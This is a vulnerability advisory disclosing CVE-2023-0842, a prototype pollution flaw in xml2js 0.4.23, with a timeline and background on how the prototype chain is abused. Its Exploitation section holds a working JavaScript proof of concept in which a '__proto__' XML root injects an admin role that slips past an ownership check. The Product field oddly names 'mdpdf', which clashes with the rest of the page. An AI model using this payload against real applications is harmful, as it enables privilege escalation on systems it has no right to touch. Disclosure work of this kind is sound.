CVE-2023-0842: xml2js 0.4.23 - Prototype Pollution | Advisories | Fluid Attacks

Summary

Name

xml2js 0.4.23 - Prototype Pollution

Code name

Myers

Product

mdpdf

Affected versions

Version 0.4.23

State

Public

Release date

2023-04-10

Vulnerability

Kind

Prototype Pollution

Rule

390. Prototype Pollution

Remote

Yes

CVSSv3 Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVSSv3 Base Score

7.3

Exploit available

Yes

CVE ID(s)

CVE-2023-0842

Description

xml2js version 0.4.23 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the `__proto__` property to be edited.

Vulnerability

Prototype pollution is a vulnerability that affects JavaScript. It occurs when a third party manages to modify the `__proto__` of an object. When a property or method is accessed, JavaScript first checks whether it exists as an own property of the object. If so, it uses it. If not, it looks in the object's prototype, and then further up the prototype chain. If the property is not found anywhere in the chain, it is reported as undefined.

Therefore, if an attacker succeeds in injecting the `__proto__` property into an object, he will succeed in injecting or editing properties that the object (and anything else sharing that prototype) resolves through its prototype chain, even though none of them are own properties.

Exploitation

Exploit.md

var parseString = require('xml2js').parseString;

// The root element name becomes the key of the parsed object. A root element
// named __proto__ therefore ends up assigned to the object's prototype.
let normal_user_request    = "<role>admin</role>";
let malicious_user_request = "<__proto__><role>admin</role></__proto__>";

const update_user = (userProp) => {
    // A user cannot alter his role. This way we prevent privilege escalations.
    parseString(userProp, function (err, user) {
        if(user.hasOwnProperty("role") && user?.role.toLowerCase() === "admin") {
            console.log("Unauthorized Action");
        } else {
            console.log(user?.role[0]);
        }
    });
}

update_user(normal_user_request);
update_user(malicious_user_request);

Evidence of exploitation

Our security policy

We have reserved the ID CVE-2023-0842 to refer to this issue from now on.

  • https://fluidattacks.com/advisories/policy/

System Information

  • Version: xml2js 0.4.23

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks’ Offensive Team.

References

Vendor page https://github.com/Leonidas-from-XIV/node-xml2js/

Timeline

2023-02-14

Vulnerability discovered.

2023-02-14

Vendor contacted.

2023-02-14

Vendor replied acknowledging the report.

2023-04-10

Public Disclosure.

Related news

GHSA-776f-qx25-q3cc: xml2js is vulnerable to prototype pollution

xml2js version 0.4.23 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the `__proto__` property to be edited.
